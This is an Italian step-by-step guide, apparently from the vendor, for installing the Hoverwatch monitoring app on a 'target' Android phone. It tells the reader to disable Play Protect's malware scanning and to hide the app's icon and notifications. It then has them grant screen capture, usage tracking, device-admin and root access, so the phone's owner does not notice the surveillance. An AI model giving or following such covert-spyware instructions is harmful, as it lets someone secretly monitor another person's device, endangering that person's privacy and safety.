Come installare Hoverwatch на Android

Istruzioni video:

Istruzioni via testo:

1. Prepara il tuo telefono target:

Per impedire ad Android di farti domande sull'attività del programma di monitoraggio:

Apri l'applicazione "Play Store" -> vai su Menu -> seleziona "Play Protect" -> vai sull'icona Impostazioni / Settings .
Disattiva "Scansiona il dispositivo contro le minacce alla sicurezza / Scan device for security threats" e "Migliora i rilevamenti delle app dannose".

2. Scarica l'app

Apri il tuo browser. Attiva la "Modalità segreta / Secret mode", se vuoi. Digita Inserisci la tua email e password (crea l'account Hoverwatch) e clicca su "ISCRIVITI GRATIS / SIGN UP FREE".

Seleziona Android e clicca sul collegamento per il download.

Vai su "Scaricare / Download".

Vai su "Apri il file / Open file".

Se non riesci a trovare la pagina "Aggiungi dispositivo / Add Device" clicca sul tasto "Menu" quindi su "Aggiungi dispositivo / Add Device".

3. Installa l'app

Vai su "Impostazioni / Settings" e consenti l'installazione dell'app.

Vai su "Indietro / Back". Tocca Installare / Install.

Se il tasto "Apri" non è attivo segui le istruzioni.

Seleziona l'opzione di installazione e tocca OK.

A seconda della scelta, potrai scegliere di nascondere l'icona di Hoverwatch.

Accetta i termini legali / legal terms.

Inserisci il nome utente d'accesso e la password del tuo account Hoverwatch. Tocca Attiva / Activate.

Attiva tutte le autorizzazioni dell'app:

Vai su "SÌ / YES" e tocca "Consenti / Allow" per attivare tutte le autorizzazioni.

Disabilita ottimizzazione della batteria:

Clicca il pulsante "Si / Yes". Clicca il pulsante "Consenti / Allow".

Attivare l’autorizzazione "Apparire in alto / Appear on top":

Clicca il pulsante "Si / Yes", abilita "Consenti autorizzazione / Allow permission". Clicca il pulsante "Indietro / Back".

Consenti all'app di catturare le schermate:

Tocca "SÌ / YES".

Abilita la voce "Non mostrare più / Don`t show again". Tocca il pulsante "Avvia ora / Start now".

Attiva il "Tracciamento dell'utilizzo / Usage tracking":

Tocca "Sì / Yes", trova e tocca la voce "Servizio di sincronizzazione / Sync Service", attiva "Consenti il tracciamento dell'utilizzo / Allow usage tracking".

002.jpg 003.jpg

Tocca due volte il tasto "indietro / back" e torna all'app Hoverwatch.

Disabilitare le notifiche dell’applicazione / app notifications:

Clicca il pulsante "Si / Yes". Disabilita "Mostra notifiche / Show notifications".

5.1.jpg 5.2.jpg

Clicca il pulsante "indietro / back" e ritorna all’app Hoverwatch.

Attivare Amministratore del dispositivo / Device admin:

Clicca il pulsante "Si / Yes" in nuovo messaggio clicca il pulsante "Attiva / Activate".

4. Controlla le impostazioni aggiuntive

Se il tuo telefono non è rootato, sei già pronto..

Se il tuo telefono è stato rootato, durante l'installazione il programma ti farà alcune altre domande.

Quando ti verrà chiesto se riavviare, rispondi "Sì".

Alla "Richiesta di autorizzazione di root", assicurati di attivare la casella "Non chiedere più", quindi clicca su "Autorizza / Authorize".

Puoi controllare se il tuo dispositivo è correttamente rootato con qualsiasi Root Checker gratuito sul Google Play Store.

L'app inizierà a funzionare dopo il riavvio del computer.

In 5-6 minuti le informazioni del dispositivo verranno visualizzate nel tuo account Hoverwatch.

show up